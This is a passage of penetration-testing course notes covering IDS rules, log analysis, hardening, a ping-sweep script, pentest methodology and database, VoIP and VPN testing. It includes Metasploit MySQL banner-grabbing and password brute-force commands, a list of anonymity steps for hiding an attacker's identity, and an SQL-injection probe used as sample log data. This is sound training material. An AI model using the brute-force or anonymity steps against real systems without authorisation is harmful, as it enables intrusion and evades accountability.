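                 "dport": 51000, "payload": b"SSH-2.0-OpenSSH_7.4\r\n"}
PKT_FACEBOOK = {"proto": "tcp", "src": "192.168.0.50", "sport": 52000, "dst": "157.240.1.35",
                "dport": 443, "payload": b"GET / HTTP/1.1\r\nHost: www.facebook.com\r\n\r\n"}
```

Running run_rules(RULES, pkt) over the four packets shows the header semantics in action: the FINGER rule fires for the external client but not for the internal one ($EXTERNAL_NET is the negation of $HOME_NET), the SSH rule catches the server's banner travelling back to the client because its direction is <>, and the two malformed rules from the notes (protocol "any", or "(msg; ...)" without a sid) are rejected by parse_rule, which is the same outcome snort -T would give.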
5391
5392Honeypots
5393=========
5394 It is a system designed to appear vulnerable to attackers. The goal of a Honeypot is to log all the attacker's activity to study their behavious, log their IP Addresses, Track their locations and collect the data about 0-day exploits. The idea of Honeypot is nothing but a server that offers any kind of services to the attackers, from ssh to telnet, showing various well known exploitable ports.
5395
5396Pentbox --> HoneyPot for Linux/unix based OS.
5397Download .tar.gz file from sourceforge.net
5398Open the terminal
5399 #cd Downloads
5400 #tar vzxf Filename.tar.gz
5401 #cd pentbox-1.0
5402 #./pentbox.rb
5403
5404
5405
UTM
===
UTM stands for Unified Threat Management. Unified threat management is an approach to consolidating security controls in one appliance: firewall, Intrusion Prevention System (IPS), Intrusion Detection System (IDS), antivirus/anti-malware, content filtering, web filtering, wireless security, logging and reporting. There are, however, operational issues to consider when evaluating and managing these devices: the appliance is a single point of failure, every module that is switched on costs throughput, and one management interface means one set of credentials guards everything.


Eg. Sophos UTM 9.

Registration for the Sophos UTM 9 demo - https://secure2.sophos.com/en-us/products/unified-threat-management/demo.aspx


https://utm.trysophos.com/


--------

5422
5423Log Analysis
5424============
5425Syntax of Log Of A Server
5426-------------------------
5427
5428IP Address | Remote Log Name | Authentication Type | TimeStamp | Access Request | Response Code | Data Transfer (Bytes) | Referrer URL | User Agent
5429
5430
5431
5432IP Address -> 127.0.0.1 --> IP Address of the visitor
5433Remote Log Name --> Identity Check for browser '-'
5434
5435Authentication --> 1. Basic Authentication
5436 2. Integrated Authentication
5437 3. Form Based Authentication
5438 4. Digest Authentication
5439
5440
5441Response Code --> 5 type of responses code
5442 1xx --> Informational resource
5443 2xx --> Successful redirection
5444 3xx --> Redirection
5445 4xx --> Client Side error
5446 5xx --> Server Side error
5447
5448Eg.
5449192.168.195.156 - - [27/Mar/2018:19:38:38 +0530] "GET /icons/back.gif HTTP/1.1" 200 216 "http://192.168.195.156/test/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
5450
5451
5452---------------------
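As an added example (not part of the original notes), here is a parser for the combined format above together with the three heuristics an analyst applies first. Every SAMPLE_LOG line except the first is constructed for this example; the first is the page's own line.

```python
"""Parse Apache/NGINX "combined" access log lines and flag abusive clients.

Added example for the log-analysis section; not part of the original notes.
All SAMPLE_LOG lines except the first are constructed for this example.
"""
import re
from collections import Counter, defaultdict

# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
STATUS_CLASS = {"1": "informational", "2": "success", "3": "redirection",
                "4": "client error", "5": "server error"}
# Characters that commonly appear in injection probes and rarely in normal paths.
INJECT_RE = re.compile("['\"]|--|/\\*|%27|%22")


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    rec = m.groupdict()
    # A scanner may send junk, so do not assume "METHOD PATH PROTO" has three parts.
    parts = rec["request"].split(" ")
    rec["method"] = parts[0] if parts else ""
    rec["path"] = parts[1] if len(parts) > 1 else ""
    rec["status"] = int(rec["status"])
    rec["class"] = STATUS_CLASS.get(str(rec["status"])[0], "unknown")
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])   # "-" means no body
    return rec


def find_suspicious(lines, scan_threshold=3, auth_threshold=3):
    """Group requests per client IP and apply three first-pass heuristics.

    - many 403/404 from one IP          -> directory/file scanning
    - many 401 from one IP              -> guessing against HTTP auth
    - 5xx on a path with quote/comment  -> possible injection probe
    Returns {ip: [reason, ...]} for every IP that trips at least one rule."""
    status_per_ip = defaultdict(Counter)
    injection_per_ip = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                        # skip lines that are not access-log entries
        status_per_ip[rec["ip"]][rec["status"]] += 1
        if rec["class"] == "server error" and INJECT_RE.search(rec["path"]):
            injection_per_ip[rec["ip"]] += 1
    findings = {}
    for ip, counts in status_per_ip.items():
        reasons = []
        if counts[403] + counts[404] >= scan_threshold:
            reasons.append("scanning (many 403/404)")
        if counts[401] >= auth_threshold:
            reasons.append("HTTP auth brute force (many 401)")
        if injection_per_ip[ip]:
            reasons.append("possible injection probe (5xx on suspicious path)")
        if reasons:
            findings[ip] = reasons
    return findings


SAMPLE_LOG = """\
192.168.195.156 - - [27/Mar/2018:19:38:38 +0530] "GET /icons/back.gif HTTP/1.1" 200 216 "http://192.168.195.156/test/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
10.0.0.7 - - [27/Mar/2018:19:40:01 +0530] "GET /admin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; Nikto/2.1.6)"
10.0.0.7 - - [27/Mar/2018:19:40:01 +0530] "GET /phpmyadmin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; Nikto/2.1.6)"
10.0.0.7 - - [27/Mar/2018:19:40:02 +0530] "GET /.git/config HTTP/1.1" 403 199 "-" "Mozilla/5.0 (compatible; Nikto/2.1.6)"
10.0.0.9 - bob [27/Mar/2018:19:41:10 +0530] "GET /secure/ HTTP/1.1" 401 381 "-" "curl/7.58.0"
10.0.0.9 - bob [27/Mar/2018:19:41:11 +0530] "GET /secure/ HTTP/1.1" 401 381 "-" "curl/7.58.0"
10.0.0.9 - bob [27/Mar/2018:19:41:12 +0530] "GET /secure/ HTTP/1.1" 401 381 "-" "curl/7.58.0"
10.0.0.12 - - [27/Mar/2018:19:42:30 +0530] "GET /item.php?id=1' HTTP/1.1" 500 512 "-" "Mozilla/5.0"
this line is not an access log entry
"""

if __name__ == "__main__":
    for ip, reasons in find_suspicious(SAMPLE_LOG.splitlines()).items():
        print(ip, "->", ", ".join(reasons))
```

The thresholds are deliberately low for a nine-line sample; on a real server tune them per time window, and remember that the IP field is the proxy's address when a reverse proxy sits in front (the real client is then in X-Forwarded-For, which this format does not log).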



 SESSION 17
 ==========

INTRODUCTION TO SYSTEM HARDENING
================================

System hardening is an auditing process in which we scan and check every aspect of a system's security, from configuration settings to the patch level of system software, looking for anything that may lead to a system compromise.
The goal is to reduce the attack surface.

Windows: critical systems with a server OS (Windows Server 2008 onwards)
Windows: non-critical systems with a desktop OS (ordinary in-house computers)
Windows: hardware devices in scope (e.g. a CCTV camera or kiosk with an embedded Windows OS inside it)

System hardening is a very critical audit process in which every aspect of security is treated as a potentially serious issue. Most companies manage system security centrally through Active Directory (Group Policy), so nobody audits a single PC by hand; that is the gap we fill as an auditor on the client site.

Sample checklist for Windows 7 : control list

 Good firewall > inbound and outbound rules.
 Antivirus
 Disable Autorun
 Disable USB mass storage
 Never download from or surf unknown sources

msconfig.exe
secpol.msc
gpedit.msc
regedit.exe


- Setting security policies using secpol.msc and gpedit.msc
- Blocking harmful file extensions such as .bat for Windows using regedit.exe (or, more cleanly, a Software Restriction Policy / AppLocker rule in gpedit.msc)
- Checking startup entries and persistence using msconfig.exe (Startup tab; on Windows 8 and later this moved to Task Manager)


ISO 27001 compliance - the bible for system auditing and system hardening (ISMS - Information Security Management System)
Of the whole ISO 27000 series, ISO 27001 (the certifiable requirements) and ISO 27002 (the code of practice for the controls) are the most widely used.
 CSO
 CISO
 Lead Auditors

- Perimeter security : perimeter security refers to natural barriers or built fortifications used either to keep intruders out or to keep what is inside contained within the boundary; on a network it is the firewall, gateway and DMZ that separate the organisation from the Internet.

Basic security configurations : checking for outdated software in the environment, old hardware running old firmware, applications running vulnerable versions, etc.

Automated security analyzers
-> Scripts (for example a subdomain finder from GitHub)
-> nmap
-> SPARTA

Linux based system hardening
----------------------------
- Lynis

Lynis - security auditing and hardening tool for UNIX-based systems.
Lynis is a security auditing tool for UNIX derivatives like Linux, macOS, BSD and others. It performs an in-depth security scan and runs on the system itself. The primary goal is to test security defenses and provide tips for further system hardening. It also scans for general system information, vulnerable software packages and possible configuration issues. Lynis was commonly used by people on the "blue team" to assess the security defenses of their systems. Nowadays, penetration testers also have Lynis in their toolkit.

Goals
=====
The main goals are:
--------------------
 Automated security auditing
 Compliance testing (e.g. ISO 27001, PCI-DSS, HIPAA)
 Vulnerability detection

The software (also) assists with:
---------------------------------
 Configuration management
 Software patch management
 System hardening
 Penetration testing
 Intrusion detection


Typical users of the software:
------------------------------
 System administrators
 Auditors
 Security officers
 Security professionals

Installation
============
Git
Clone or download the project files (no compilation nor installation is required):

 git clone https://github.com/CISOfy/lynis
Execute from inside the cloned directory (the script looks for its include files relative to itself), as root so that it can read the files that matter:

 cd lynis
 sudo ./lynis audit system

Findings and suggestions are summarised on screen and written to /var/log/lynis-report.dat, with the full log in /var/log/lynis.log.


--------------------------------------------------------------------------


Bash Scripting
==============

Creating a tool like Netdiscover which shows active hosts in a network.

File name : searchip.sh

Building the pipeline up one step at a time:
- ping 192.168.0.1, ping 192.168.0.2 etc. (pings forever; we want a single probe)
- ping -c 1 192.168.0.1, ping -c 1 192.168.0.2 etc. (-c 1 sends one echo request)
- ping -c 1 192.168.0.1 | grep "64 bytes", ping -c 1 192.168.0.2 | grep "64 bytes" etc. (keep only the reply line; a host that does not answer prints nothing)
- ping -c 1 192.168.0.1 | grep "64 bytes" | cut -d " " -f4, ping -c 1 192.168.0.2 | grep "64 bytes" | cut -d " " -f4 etc. (the fourth space-separated field is "192.168.0.1:")
- ping -c 1 192.168.0.1 | grep "64 bytes" | cut -d " " -f4 | cut -d ":" -f1, ping -c 1 192.168.0.2 | grep "64 bytes" | cut -d " " -f4 | cut -d ":" -f1 etc. (drop the trailing colon, leaving the bare address)

- Looping statement (1 to 254: .0 is the network and .255 the broadcast address; -W 1 makes a silent host give up after one second instead of the default wait)
 #!/bin/bash
 # searchip.sh - print every host in 192.168.0.0/24 that answers one ICMP echo
 for i in $(seq 1 254);
 do
 ping -c 1 -W 1 192.168.0.$i | grep "64 bytes" | cut -d " " -f4 | cut -d ":" -f1
 done

Caveat: this only finds hosts that answer ICMP. A host firewall that drops echo requests makes the host invisible here, which is why Netdiscover uses ARP requests instead; on the local segment a host must answer ARP to communicate at all.

------------------------------------------------------------------------------------



 SESSION 18
 ==========

INTRODUCTION TO PENETRATION TESTING
-----------------------------------
Penetration testing is the phase after information gathering and vulnerability assessment (VA), in which we actually exploit the vulnerabilities discovered in the VA phase to prove their impact.
WEB PT
NETWORK PT
MOBILE PT - MobSF (Mobile Security Framework) for .apk and .ipa files
Documentation : Digital Security Report




Ethics of a Penetration Tester
------------------------------
1. Nothing outside the agreed scope, however tempting.
2. You are a hacker, not a hero: find, prove and report; do not take it upon yourself to fix or police the client's systems.
3. Documentation is for developers, not for the CEO, so make it technically precise and reproducible (an executive summary can sit on top).
4. Read the code of conduct and make sure you do nothing that is beyond the agreed scope.




Penetration Testing Methodologies
---------------------------------
1. Web based pen testing : scope + information gathering + exploitation + report with remediations + applying the patch through the company's own team (the tester does not patch).
2. Network and mobile : the same cycle applied to network assets and mobile apps.
3. Process or governance : read the policies, contracts, vendor agreements and so on + find loopholes in clauses + report and identify them to high level management + draft new policy.

ISO 27001 compliance : read




Scope Analysis
--------------
Step 1: Query (request) for VAPT from the client
Step 2: Scoping document WEB/NETWORK/MOBILE
Step 3: Response meeting
Step 4: Proposal with price and man-day cost
Step 5: Acceptance and date to start the project.



Customer and Legal Agreements
-----------------------------
-> Code of Conduct signing
-> NDA - Non-Disclosure Agreement
-> MOU - Memorandum Of Understanding
Do not send a single packet before the signed authorisation is in hand; without it the "test" is unauthorised access.


Pen Testing Planning and Scheduling
-----------------------------------
Teams

VA : Web, Network, Mobile, Compliance

PT : Web, Network, Mobile, Compliance

Date start : 21st Jan 2016 to 26th Jan 2016

Total number of days : 6 man days
Green zone (the window in which testing is permitted) : weekends (Saturday, Sunday), 2 days a week for 3 weeks
Night shift : 8.00 PM -> Monday 3 AM (422 servers)

Sr. Resource : RM (relationship manager) --> single point of contact for the client.


Pre Pen Testing Checklist
-------------------------
1. License requirements (are the commercial tools you intend to use licensed for this engagement?)
2. List of tools to be used in the testing
3. Team listing and tracking


Types of Pen Testing
-> Internal : network pentesting and internal application-layer pentesting, in which we audit and test all network assets of the organisation along with all in-house web applications that run on the internal network.

-> External : web application testing + pentesting through the company VPN, i.e. everything reachable from outside.



-> White Box : White box testing, also known as clear box testing, refers to testing a system with full knowledge of and access to all source code and architecture documents. Having full access to this information can reveal bugs and vulnerabilities more quickly than the "trial and error" method of black box testing.
 The scope is clear: which OS runs on each machine, open port details, service pack details, kernel details, critical or non-critical classification, versions of services, application source code visibility, etc.

-> Grey Box : Grey box testing means testing a system while having at least some knowledge of its internals. This knowledge is usually limited to detailed design documents and architecture diagrams. It is a combination of black and white box testing, and combines aspects of each.
 For network PT, a list of IP addresses and host name details, that's all. For web, the subdomain names, and that's all.

-> Black Box : Black box testing refers to testing a system without specific knowledge of its internal workings: no access to the source code and no knowledge of the architecture.
 Website www.target.com and the IP list in scope, nothing more.


7 STEPS TO BE ANONYMOUS
=======================
1. Don't ever use your personal home laptop.
2. Use a live Linux OS (Kali Live), optionally in persistence mode.
3. Before connecting to the Internet, change your MAC address (macchanger).
4. Change the user agent of your browser (User Agent Switcher).
5. Set up proxychains (see the Null Byte tutorials).
6. Connect through public Wi-Fi.
7. Use Tor with a VPN. Enjoy :)
These steps hide the tester's identity, which matters for red-team and OSINT work; an authorised pentest is normally run from a known, whitelisted source IP so the client can tell the tester's traffic apart from a real attack.

--------------------------------------------------------------------------------------------------



 SESSION 19
 ==========

PHYSICAL SECURITY PENETRATION TESTING
=====================================

After virtual (network and application) security audits, major corporations may not deploy much money and resources to ensure that the physical environment is secure. Hence auditing physical security can be a big task for these organisations: a fully patched server is still compromised if someone can walk up to it with a USB stick.

Referring to ISO 27001, ISO 27002 (Annex A.11, physical and environmental security)

Major organisations which need physical security
------------------------------------------------
- Nuclear power plants
- Space stations
- Hydrogen experimental sites
 etc.

Physical Security Checklist Areas
---------------------------------
1. Organisation surroundings
2. Ensure the people in the organisation follow the physical security rules.
- They must use ID cards for authentication
- There must be a log of all in-out activities
- There should be a physical security person (team) monitoring 24*7 the in-out movements of the employees.
- The reason for each visit should be validated.

Checklist for entering the server room.
-> Name of the visitor
-> Company of the visitor
-> Scanned copy of the company ID card
-> Aadhaar card / driving licence etc.
-> Name of the person who is bringing the visitor
-> Company he belongs to
-> ID card number
-> Devices they are carrying
-> Hand over your phone, switched off, to the gatekeeper
-> Locker keys will be given back to you.

Within the working space physical security checklist
 - Clean desk policy
 - After a meeting, and after all the chats and planning, before you leave the discussion room you have to clear the whiteboard or glass on which you wrote anything about the task to be executed.
 - Shred any document before throwing it in the dustbin.

Dumpster diving : the process in which a hacker sneaks into the garbage of a home or organisation and looks for something useful (printouts, sticky notes, old media).

- Make sure people in the organisation do not write any kind of information on sticky notes or on their desk with marker or pen.

Serious Security Checklist
--------------------------
1. There must be fire extinguishers in all rooms and places in the organisation.
2. There must be an AMC (annual maintenance contract) with the fire safety company.
3. There must be biometric authentication on the server room.
4. There must be cameras inside the server room.
5. The electricity room and generator room should be at separate locations.

ISO 27001 : Physical security control list

Watch here, Red Team Breach: https://www.youtube.com/watch?v=pL9q2lOZ1Fw

--------------------------------------------------------------------------------------------------

Database Penetration Testing
----------------------------
Attack classes to test for:
1. Authentication bypass
2. Union based SQL injection
3. Blind SQL injection
4. Error based SQL injection
5. Time based SQL injection
6. Double query SQL injection
7. Stacked query SQL injection
8. Header based SQL injection (injection through HTTP headers such as User-Agent or X-Forwarded-For that the application stores or logs)
9. Second order SQL injection
10. Boolean based SQL injection
11. XPath injection
12. LDAP injection
Note that 3 is the family to which 5 and 10 belong: a blind injection returns no data directly, and the attacker infers the answer either from a true/false difference in the page (boolean based) or from a delay (time based).


Default ports of common database servers
Oracle : 1521
MS-SQL : 1433
MySQL : 3306 (lab target: MySQL 5.0.45 Community Edition)



Step 1: Scan the system with nmap and identify the database port and its version.
nmap -A <target IP>
nmap -sS -sC -sV 192.168.43.122 -p3306

Banner Grabbing :
(The MySQL server announces its version in the very first packet it sends, before any login, so the version can be read without credentials; if the server replies with an error such as "Host ... is not allowed to connect" you still learn that it is MySQL, but not the version.)

msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(scanner/mysql/mysql_version) > show options

Module options (auxiliary/scanner/mysql/mysql_version):

 Name     Current Setting  Required  Description
 ----     ---------------  --------  -----------
 RHOSTS                    yes       The target address range or CIDR identifier
 RPORT    3306             yes       The target port (TCP)
 THREADS  1                yes       The number of concurrent threads

msf auxiliary(scanner/mysql/mysql_version) > set rhosts 192.168.195.218
rhosts => 192.168.195.218
msf auxiliary(scanner/mysql/mysql_version) > run


Brute Force :

Step 2: Scan the version : use auxiliary/scanner/mysql/mysql_version
Step 3: info
Step 4: set RHOSTS <IP address>
Step 5: run
Step 6: use auxiliary/scanner/mysql/mysql_login
Step 7: set USER_FILE /root/Desktop/usernames.lst
Step 8: set PASS_FILE /root/Desktop/passwords.lst
Step 9: run
(set BLANK_PASSWORDS true is worth adding before run: a root account with no password is the most common finding, and mysql_login only tries it when asked.)


VOIP Pentesting : Voice Over Internet Protocol.
It is a process in which we try to sniff the voice packets and conversations within an organisation that uses VOIP devices for internal communication. SIP carries the call signalling and RTP carries the audio; if neither is encrypted (TLS for SIP, SRTP for RTP), anyone on the path can reconstruct the call.

Avaya : the most trusted brand in VOIP communication*

Put call through VOIP --> Target
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attacker : intercept via Cain & Abel, which has a SIP/RTP sniffing facility (Wireshark's Telephony > VoIP Calls view can likewise replay captured RTP audio).

VPN Pentesting
--------------
A VPN exists to encrypt the packets leaving a device, so VPN pentesting checks the tunnel itself: which protocol and cipher suites the gateway offers (IPsec/IKE, SSL/TLS, PPTP), whether weak options such as PPTP with MS-CHAPv2 or IKE aggressive mode with a pre-shared key are enabled, and whether the gateway leaks information before authentication.

------------

lucideustech.blogspot.com/2018/02/tracing-and-terminating-reverse.html



 SESSION 20
 ==========

BoF PART 2
==========

https://drive.google.com/open?id=1XBV7jiG2pUMU7zC9y5FuoeBc6SOm_JaL